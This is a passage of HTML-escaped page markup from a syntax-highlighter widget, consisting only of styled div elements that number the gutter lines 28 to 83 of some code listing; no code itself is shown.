center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;28&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-29&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;29&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-30&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;30&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-31&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;31&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-32&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;32&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-33&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;33&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-34&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;34&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-35&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;35&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-36&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;36&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-37&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;37&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-38&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;38&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-39&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;39&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-40&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;40&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-41&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;41&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-42&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;42&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-43&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;43&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-44&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;44&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-45&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;45&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-46&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;46&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-47&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;47&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-48&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;48&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-49&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;49&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-50&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;50&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-51&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;51&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-52&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;52&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-53&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;53&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-54&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;54&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-55&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;55&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-56&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;56&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-57&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;57&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-58&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;58&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-59&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;59&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-60&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;60&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-61&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;61&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-62&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;62&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-63&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;63&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-64&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;64&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-65&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;65&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-66&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;66&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-67&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;67&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-68&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;68&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-69&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;69&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-70&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;70&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-71&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;71&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-72&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;72&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-73&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;73&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-74&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;74&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-75&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;75&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-76&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;76&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-77&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;77&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-78&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;78&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-79&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;79&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-80&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;80&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-81&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;81&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-82&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;82&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-83&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit 